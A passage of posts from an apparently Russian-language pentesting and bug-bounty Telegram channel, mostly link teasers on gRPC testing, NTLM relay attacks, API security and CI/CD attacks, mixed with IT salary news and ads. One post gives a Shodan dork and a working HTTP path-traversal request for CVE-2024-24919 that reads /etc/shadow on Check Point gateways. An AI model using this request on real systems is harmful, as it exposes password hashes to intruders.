Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4
Измените тип контента с application/json на text/plain и посмотрите, принимает ли он по-прежнему запрос 🥷
#bugbounty #tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3
🥷 Пентест gRPC: гайд для этичного хакера
Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.
👉 Читать
#pentest #bugbounty
Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.
👉 Читать
#pentest #bugbounty
Forwarded from Библиотека дата-сайентиста | Data Science, Machine learning, анализ данных, машинное обучение
💸📊 На сколько просели зарплаты в ИТ в 2024 году?
Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.
🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.
👉 Остальные данные — в статье
👉 Зеркало
Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.
🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.
👉 Остальные данные — в статье
👉 Зеркало
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
🥷 Изучение необычных методов атаки на NTLM relay
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
1️⃣ Enumerating Domain Usernames via a Non-Admin SMB Relay
2️⃣ Relaying to Microsoft SQL Server
3️⃣ Relaying to LDAP and Configuring Resource-Based Delegation
4️⃣ Shadow Credentials Attack with no Prior Credentials
5️⃣ Shadow Credentials Attack Using Prior Credentials
#pentest #redteam
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GuidePoint Security
Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques
Threat & Attack Simulation Technical Lead Kevin Murphy details 5 lesser-known NTLM relay attacks that have to help you penetration test your networks.
🔥2
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
🐳✈️ Docker ушёл из РФ! Инструкция по восстановлению доступа к Docker Hub для пользователей из России
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
🥱7❤2👍1😁1😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from Библиотека программиста | программирование, кодинг, разработка
💻⌛ 8 причин участвовать в хакатонах
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
❤2👍2🔥1
Исследователь из PortSwigger рассматривает новую технику эксплуатации, которую можно использовать для полной компрометации веб-приложения с помощью TRACE — древнего метода HTTP, который поддерживается более широко, чем вы думаете.
👉 Читать
#bugbounty #pentest #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
This media is not supported in your browser
VIEW IN TELEGRAM
#vim позволяет использовать любой разделитель регулярных выражений при замене шаблона.
Нет необходимости использовать
Это позволяет избежать экранирования символа
#tips
Нет необходимости использовать
/, попробуйте вместо этого #:
:s#/usr/local/bin#/usr/sbin#g
Это позволяет избежать экранирования символа
/.#tips
🔥5👍4
Вы узнаете, как:
☑️ Традиционные приложения полагались на отдельные файлы, получаемые с помощью HTTP-запросов, в то время как современные объединяют код в пакеты и используют API для создания динамического контента.
☑️ Мобильные приложения, IoT и веб-приложения взаимодействуют через API.
Кроме того, вы получите представление о 10 основных рисках безопасности API OWASP + ценные ресурсы для безопасной разработки API.
#pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🥱1
Обзор двух RCE, path traversal и memory leak от канала Bug Bounty Reports Explained. Кратко, ёмко и по делу👇
👀 Смотреть
#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Устраивает ли вас ваша зарплата?
Anonymous Poll
11%
Более чем
40%
Нет, не устраивает
19%
— Вот возьми, твоя зарплата. — Это же ветка?!
1%
Свой вариант (напишу в комментариях)
29%
Посмотреть результаты
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
🌚1
Из нового выпуска вы узнаете об интересном мире уязвимостей и пути Антона в ИБ-индустрии. Bo0oM — КМС по вольной борьбе с уязвимостями и владелец черного пояса в мастерстве кидания кавычек.
⏱️ Таймкоды:
01:54 Антон или Дима?
04:32 С чего начинался интерес к секьюрити
06:26 Первый взлом на игре resident evil
08:36 Хотел ли стать реверсером или хардварщиком?
10:55 Спуфинг вайфая на секьюрити конференции для исследования
12:56 Как попал в Onsec и знакомство с Иваном
19:05 Откуда шло развитие и мотивация
22:30 Багхантинг и не материальные бенифиты
28:49 Материальные бенифиты и максимальные выплаты на багхантинге
33:35 Обратная сторона исследований и угрозы
35:30 История с МТС и шуточным сообщением на забытом поддомене
40:35 Подход для выбора цели исследования
42:10 Взлом платформы для разблокировки украденных устройств
49:55 Перво место на хакатоне и премия мэра на 1 миллион рублей
1:00:33 «Стартапы» Антона и сложности предпринимательства
1:11:30 Судьба Взрывного блога
1:16:13 Как сохранять мотивацию и интерес к работе за такой большой промежуток времени
1:18:51 Повлияла ли работа на личную жизнь
1:21:08 Влияние AI на индустрию
1:23:58 Способ оставаться в трендах и оставаться в курсе тенденций и угроз индустрии
#podcasts
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2🔥1🥰1
Практические ресурсы для исследования безопасности CI/CD:
🧠 Техники
🛠️ Инструменты нападения
🗒️ Тематические исследования
👉 GitHub
#tips #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
💬 Что не так с этим кодом? Каким багам он подвержен? Свои ответы пишите в комментарии👇
#вопросы_для_самопроверки
#вопросы_для_самопроверки
👍2
Подписывайтесь на наш новый канал про нейросети для создания изображений, там есть:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1